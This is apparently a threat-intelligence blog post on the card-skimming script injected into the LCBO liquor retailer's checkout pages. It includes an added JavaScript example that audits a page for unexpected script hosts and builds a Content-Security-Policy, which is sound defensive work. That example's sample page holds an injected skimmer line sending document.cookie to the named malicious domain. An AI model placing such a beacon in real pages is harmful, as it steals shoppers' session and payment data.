Don't Mess with my Booze

On 12 January, Canadian alcohol retail giant LCBO announced that an “unauthorized party embedded malicious code” onto its website in order to steal information from customers in the process of checking out.  Over five days in January, they wrote, customers “may have had their information compromised.”  In fact, the infection was one of several to target LCBO customers in the last month, including an attack that lasted for more than a week that the company has not publicly acknowledged.

Researchers said they found the first payment-skimming malware infection occurred on LCBO’s website on 28 December, and that it lasted until 4 January 2023.  The second infection, acknowledged by LCBO in statements released last week, began on 5 January 2023 and lasted until 10 January.[1] 

LCBO, which stands for Liquor Control Board of Ontario, is a government enterprise and now one of the largest retailers and wholesalers of alcoholic beverages in the world.  It said last week that it was shutting down its website and app to investigate a “cybersecurity incident.”[2]  Their 680 retail stores are still able to operate, according to a statement the following day.  Third-party experts were hired to address the incident.  “At this time, we can confirm that an unauthorized party embedded malicious code into our website that was designed to obtain customer information during the checkout process,” LCBO said, adding that customer information provided on their checkout pages may have been “compromised.”  The information stolen included names, email and mailing addresses, membership account details, account passwords and credit card information.  They urged customers who made purchases in that time period to check their credit card payments and report suspicious transactions. 

Last week, an LCBO spokesperson said that they are continuing to investigate the situation and are identifying specific customers who were impacted so that they can communicate with them directly.  The website and app are back up and running but all account passwords have been reset.  The website has had an average of 3,058,000 monthly visits over the past three months, with 94% coming from within Canada and 3% coming from the US. 

The hackers reportedly injected JavaScript into the website, allowing them to exfiltrate data stolen from the checkout page.  Researchers said they have seen this type of attack in various forms since August 2020.  They have discovered five other e-commerce domains with infections that used the same malicious domain, lotilabs[.]org, for either e-skimmer hosting or exfiltration.
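One way a site owner can check a checkout page for this kind of injected script and configure a policy that would block it, shown here as an added example that is not part of the article and not code from LCBO, Recorded Future or Tanium.  The sample page, the allowlisted hosts shop.example and cdn.example, and the helper names are constructed for this example; the only name taken from the article is the lotilabs[.]org domain.  The audit flags every host the page references that is not on the allowlist (both script src attributes and URLs hard-coded in inline JavaScript, which is how a beacon to an exfiltration host typically appears), and the Content-Security-Policy it builds restricts both where scripts may load from and where the page may send data.

```javascript
// Added example (not from the article or from any organization it names):
// audit a checkout page's HTML for script sources and external hosts that
// are not on an allowlist, then build a Content-Security-Policy that would
// stop an injected skimmer from loading or exfiltrating. Node.js, no deps.

// Assumed allowlist: the store's CDN and its own origin (constructed).
const ALLOWED_HOSTS = new Set(['shop.example', 'cdn.example']);

// Constructed sample page: one legitimate script plus an injected one that
// loads from, and beacons to, the domain the article names as the skimmer host.
const SAMPLE_HTML = `
<html><head>
<script src="https://cdn.example/js/checkout.js"></script>
<script src="https://lotilabs.org/js/jquery.min.js"></script>
</head><body>
<form id="checkout">...</form>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    new Image().src = 'https://lotilabs.org/collect?d=' + btoa(document.cookie);
  });
</script>
</body></html>`;

// Every http(s) URL in the page, whether in a src attribute or inside inline JS.
function extractUrls(html) {
  return html.match(/https?:\/\/[^\s"'<>)]+/gi) || [];
}

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Hosts referenced by the page that are not on the allowlist, sorted.
function findUnexpectedHosts(html, allowed = ALLOWED_HOSTS) {
  const hosts = new Set();
  for (const url of extractUrls(html)) {
    const h = hostOf(url);
    if (h && !allowed.has(h)) hosts.add(h);
  }
  return [...hosts].sort();
}

// CSP that only permits scripts from, connections to, and images from the
// allowlisted hosts. 'self' covers the store's own origin. No 'unsafe-inline',
// so an injected inline script is blocked as well as an injected remote one.
function buildCsp(allowed = ALLOWED_HOSTS) {
  const hosts = [...allowed].map(h => `https://${h}`).sort().join(' ');
  return `default-src 'self'; script-src 'self' ${hosts}; ` +
         `connect-src 'self' ${hosts}; img-src 'self' ${hosts}`;
}

// Does the policy's directive list this host as an allowed source?
function cspPermits(csp, directive, host) {
  const d = csp.split(';').map(s => s.trim()).find(s => s.startsWith(directive + ' '));
  if (!d) return false;
  return d.split(/\s+/).slice(1).includes(`https://${host}`);
}

console.log('unexpected hosts:', findUnexpectedHosts(SAMPLE_HTML));
console.log('suggested CSP:', buildCsp());
```

Running it on the sample page reports lotilabs.org as the one unexpected host; under the generated policy a script load from that host and an image or fetch beacon to it are both refused by the browser, while the CDN script still loads.  The same audit is cheap to run against a saved copy of the live page on a schedule, which is how a retailer would notice a second injection of the kind the article describes rather than waiting for a researcher to report it.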

[Figure: Recorded Future experts used a browser’s developer view to show the malicious line of code embedded in LCBO’s website.]


LCBO did not respond to requests for comment about whether their investigation included the first infection or whether customers from that first infection were also being notified alongside those from the second.  Tanium said e-skimmer attacks have been around for years, yet many retailers still haven’t learned the lessons from high-profile incidents involving Target and Ticketmaster, namely, to patch frequently.  “Many business owners are simply using a service and do not have the technical expertise or resources to do that work,” they said.  “From the consumer side it is always prudent to use cards that have fraud protection, use virtual cards where possible for web e-commerce, monitor purchases regularly (most financial institutions allow account activity to be sent via text).”


Recorded Future discovered 1,520 unique malicious domains involved in the infections of 9,290 unique e-commerce domains in 2022.  Most involved campaigns in which groups used fake payment card forms or took over legitimate merchant web infrastructure to install e-skimmers.  The company reported breaches that exposed customer payment card data at over 1,000 unique merchants in 2022.  “For 77% of the merchants, we have identified compromised payment cards from the breaches on the dark web,” they said.

The e-skimmers led to 45.6 million compromised payment card records posted for sale on dark web platforms in 2022.[3] 


Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com


Weekly Cyber Intelligence Briefings:


  • Reporting: https://www.redskyalliance.org/
  • Website: https://www.wapacklabs.com/
  • LinkedIn: https://www.linkedin.com/company/64265941

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5504229295967742989  
[1] https://therecord.media/canadas-largest-alcohol-retailer-infected-with-card-skimming-malware-twice-since-december/

[2] https://www.lcbo.com/content/lcbo/en/corporate-pages/about/media-centre/news/2023-01-10.html

[3] https://therecord.media/59-4-million-compromised-payment-card-records-posted-for-sale-on-dark-web-in-2022-report/